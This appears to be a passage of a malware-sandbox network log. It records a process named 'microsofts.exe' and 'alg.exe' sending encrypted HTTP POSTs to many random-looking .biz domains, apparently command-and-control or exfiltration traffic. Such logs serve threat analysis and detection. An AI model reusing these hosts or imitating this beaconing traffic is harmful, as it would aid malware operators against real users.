                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:56.390496969 CET347OUTPOST /nuxw HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: typgfhb.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:56.390522957 CET778OUTData Raw: c9 d2 19 11 ef 73 42 b2 fe 02 00 00 f9 51 de 5f ce 5f 24 d3 77 d2 67 f0 e3 82 ae 93 9d 60 f4 b3 a3 42 ec d3 09 cd be 9e 2e ec 92 8e 69 24 74 c1 c2 24 38 78 e7 ab 48 06 d1 c7 83 0c 2c a3 72 34 6b c9 d3 14 d9 cb 56 8b 2d b6 94 54 2b fd 8f c3 9a 9f
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: sBQ__$wg`B.i$t$8xH,r4kV-T+3$XoQTLL!tVXFp=?WPAloEr|VwtUipEYGRc~;;wR>1P[OZ6[\Fve3co
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:57.803448915 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:57 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=aaf54b1fdd9531f6778e5ea9363347a4|173.254.250.76|1730822637|1730822637|0|1|0; path=/; domain=.typgfhb.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              77192.168.2.55974544.221.84.105801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:56.395634890 CET350OUTPOST /qunybk HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: jhvzpcfg.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:56.395669937 CET828OUTData Raw: 35 29 07 31 95 36 99 8b 30 03 00 00 e0 c6 0f ec 42 6e 21 03 ec 2c ba b6 75 23 98 d9 04 4d d2 bf bf 09 6e 4a 44 f0 7d 25 2b 5c d1 0d 7f 60 f4 ab 08 74 12 28 1a 49 b2 ff 42 3a 99 bc ad 7f 6a 96 a1 c7 97 36 42 48 dd f3 72 38 4f 88 33 22 ca 86 ce 7b
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 5)160Bn!,u#MnJD}%+\`t(IB:j6BHr8O3"{Ozp [vO%QRdrY+a(FRt7F&Fjs.KY)5q@C"gQNK{{&xaZ|hkgV)'tpB:a
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:57.081610918 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:56 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=f46b4041a40b159a8f82b183774e390f|173.254.250.76|1730822636|1730822636|0|1|0; path=/; domain=.jhvzpcfg.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              78192.168.2.55974618.141.10.107801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:57.218492985 CET346OUTPOST /gu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: acwjcqqv.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:57.218523026 CET828OUTData Raw: 51 84 c8 d3 e0 1b 72 c7 30 03 00 00 f0 f4 99 1f 0d 81 cc b5 a7 27 c0 a0 9d 4d e9 73 28 01 9b ec ce 21 5a 00 86 f2 28 54 be 3c 6a d0 92 39 79 14 bf d3 c7 8e 14 50 83 4f 06 c4 a5 c8 3f ea 24 12 04 cd e9 be e8 24 e1 c7 ba 46 09 ab 47 80 93 af 93 55
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: Qr0'Ms(!Z(T<j9yPO?$$FGU$l9LS%pUqmqbO?,s8_&f-vYDICcW\b6+W7KT%<?u\V`s_psi{#v/dMW<Ei{"^<E{>=
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:58.682744980 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:58 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=36dbe52dfd4ae17ee4f0759031731550|173.254.250.76|1730822638|1730822638|0|1|0; path=/; domain=.acwjcqqv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              79192.168.2.55974734.211.97.45801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:58.093278885 CET344OUTPOST /vne HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: esuzf.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:58.093278885 CET778OUTData Raw: 00 34 cf 8b 1d ca 87 31 fe 02 00 00 73 98 31 38 1e 7d 63 e2 e7 fe 8f 69 61 b3 31 6a aa 94 54 fa 83 a4 66 92 83 d4 28 81 9b a4 89 e9 ce f6 5f 5a 0f a1 12 03 5d 6a 5e cd 17 4c 40 e0 a9 d9 fe 43 c4 6d f6 64 89 a4 7c 9c 18 b8 51 31 d8 49 b0 5a c2 b3
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 41s18}cia1jTf(_Z]j^L@Cmd|Q1IZ%AjUuC+lhg!y?ny;RyQD,MwV`;WJ}.XqpO>!O*jQ vB-:(C/|uFgSdPn~:/0v:5YR4
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:58.913218975 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:58 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=a5243742a59754affb0fd3c93758a3b0|173.254.250.76|1730822638|1730822638|0|1|0; path=/; domain=.esuzf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              80192.168.2.55974818.246.231.120801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:58.759187937 CET342OUTPOST /v HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: vyome.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:58.759257078 CET828OUTData Raw: 90 68 68 81 de 01 59 bc 30 03 00 00 64 71 7b e3 2f 68 cd 37 5f 16 36 5f ca 94 73 7e 1f 06 79 e7 ac eb 8b bf dd 33 d9 94 db 36 76 05 f0 c0 37 07 cc 2b c0 08 6a 28 6d 68 06 9f 5b 80 c4 39 a2 b6 38 04 fa 4c 16 9f 66 71 47 52 af fd 20 aa c2 4a 4c 90
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: hhY0dq{/h7_6_s~y36v7+j(mh[98LfqGR JLA:N^P7isRyw1-hO#FPl;B%F)mF@cm|qh}3/WA(]WPQoB">K;"s8fiC0D|q8"{V|M_gs<Ha}w
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:59.594988108 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=cb6b4bbf63a549cf45db1916482981de|173.254.250.76|1730822639|1730822639|0|1|0; path=/; domain=.vyome.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              81192.168.2.5597493.94.10.34801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:59.258522034 CET353OUTPOST /mshapsve HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: gvijgjwkh.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:59.258552074 CET778OUTData Raw: d8 7e 56 25 a7 81 45 af fe 02 00 00 13 5b 63 a2 36 a1 9a 1e ea f9 14 52 62 3f 74 59 71 97 8f 7b 7e 6a 81 5d 89 e2 99 d3 0d 0d 03 1a 78 4a 03 6e fd 14 12 07 b2 6b 61 49 d1 77 2c 4b 5a e9 07 69 a3 e5 c2 47 24 76 61 19 5a 64 61 13 fb a5 33 49 3b 76
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: ~V%E[c6Rb?tYq{~j]xJnkaIw,KZiG$vaZda3I;vPHV;&Se"7M|1$ACSI?0KL=gcmd4|6:v}by;m^=5G?n\[VPks$6>C3s5}5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:59.919799089 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:03:59 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=8064358995643f6c762507257adff1ff|173.254.250.76|1730822639|1730822639|0|1|0; path=/; domain=.gvijgjwkh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              82192.168.2.55975118.208.156.248801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:59.832312107 CET353OUTPOST /roupupjil HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: yauexmxk.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:59.832334042 CET828OUTData Raw: 48 81 04 e4 3b c0 41 7f 30 03 00 00 85 38 2b 55 b7 77 42 3d d7 0f f3 0b 02 20 ca 20 4d 74 ea 75 64 0b 41 2c b7 25 2d da 42 4f 8d 2b 89 f0 57 05 a6 d2 8c fe 72 8c d4 39 ab ce fc e6 bf 3d dd 95 ac 80 53 9c 4e 6c 54 eb 57 85 13 1f 5d 94 a4 c0 43 2f
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: H;A08+UwB= MtudA,%-BO+Wr9=SNlTW]C//EDQ2oC_eZ-:Ig~F/7lA+4m[]@yc?f~kMpDm:[7aM!Q| +ofL 33nOH]$c31N_LCcGCm
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:00.505268097 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=4d41f6f0af2fb88020ee76e4b44358d4|173.254.250.76|1730822640|1730822640|0|1|0; path=/; domain=.yauexmxk.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              83192.168.2.55975218.246.231.120801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:00.242958069 CET348OUTPOST /pbcmr HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: qpnczch.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:00.242971897 CET778OUTData Raw: e2 e0 d6 56 1b af 41 ce fe 02 00 00 10 8a 55 cb d9 18 95 ab 1b 89 98 80 d9 6d c5 ae 0a 05 31 3d 5c b2 00 f6 58 be ad 4e 2c 22 9d f4 fe 7c 33 a9 d9 85 ce 42 1e 82 f7 ef 7b c0 d8 7b f3 14 57 ad 0a c9 06 49 31 b2 ac 5f 85 ae 81 b1 e0 c2 e2 10 5b 07
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: VAUm1=\XN,"|3B{{WI1_[`w?yTxc'7(jR}}grE0ui#x4H7{LfO(5Y+7~{uuT,O^pxKB;`,V\V_5"T^isYA%]Awn}
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:01.078316927 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=fe19a8f0323f663f372196f61d2c6568|173.254.250.76|1730822640|1730822640|0|1|0; path=/; domain=.qpnczch.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              84192.168.2.55975313.251.16.150801816C:\Users\user\AppData\Local\Temp\microsofts.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:00.544456005 CET349OUTPOST /megjwol HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: iuzpxe.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 828
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:00.544485092 CET828OUTData Raw: b6 74 7b 95 e9 77 de 61 30 03 00 00 ed 4c 7a 4e 8c 80 6b 2c 3f 05 17 34 91 72 40 6e bf 43 46 f0 ed 89 ff e2 c3 72 06 e0 85 53 e5 b0 7b cb 8d 56 db 9d 20 09 e2 6e 56 c5 64 01 63 43 6a 15 6f 15 96 7f 7a 78 d5 c7 56 fe e2 7a 44 e1 2f 09 bb 76 2e 16
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: t{wa0LzNk,?4r@nCFrS{V nVdcCjozxVzD/v.)I;g]bB-]L53[y!9_zkvPqE:),^C8Mo:x\_2Eus+zd;i86P6$5C?&oj` 8
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:01.988516092 CET414INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:01 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=6b2a346cf8f6d837418f708b50956bd8|173.254.250.76|1730822641|1730822641|0|1|0; path=/; domain=.iuzpxe.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                              85192.168.2.5597543.254.94.185801492C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:01.323533058 CET354OUTPOST /usismcqqdljny HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                              Host: brsua.biz
                                                                                                                                                                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:01.323553085 CET778OUTData Raw: ee 25 1c 51 92 a0 b8 96 fe 02 00 00 8b 1d bc 5a fc 2d 0e f7 c7 c0 9f f8 26 dd 28 8e a7 0c e9 23 9d 89 0d bc 49 dc 7f 85 3a 76 1e 3c fd 04 24 34 bc 45 e6 b9 6b 6a 8f 8d 43 5d d0 8a 01 2f 99 23 b2 6b bc 3d 9c 0c 6c 22 f1 90 ee be da 7b 1f f0 c4 e2
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: %QZ-&(#I:v<$4EkjC]/#k=l"{ch&%T8x_^1lx`us%z7*]cO{Cx{k6M$}I'WKmDya_qr&EfH{[-`Y~AW#>0:k3`
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.291873932 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                              Date: Tue, 05 Nov 2024 16:04:02 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: btst=093b3098c5c0d56b188c543706934c56|173.254.250.76|1730822642|1730822642|0|1|0; path=/; domain=.brsua.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                              Set-Cookie: snkz=173.254.250.76; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                              Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
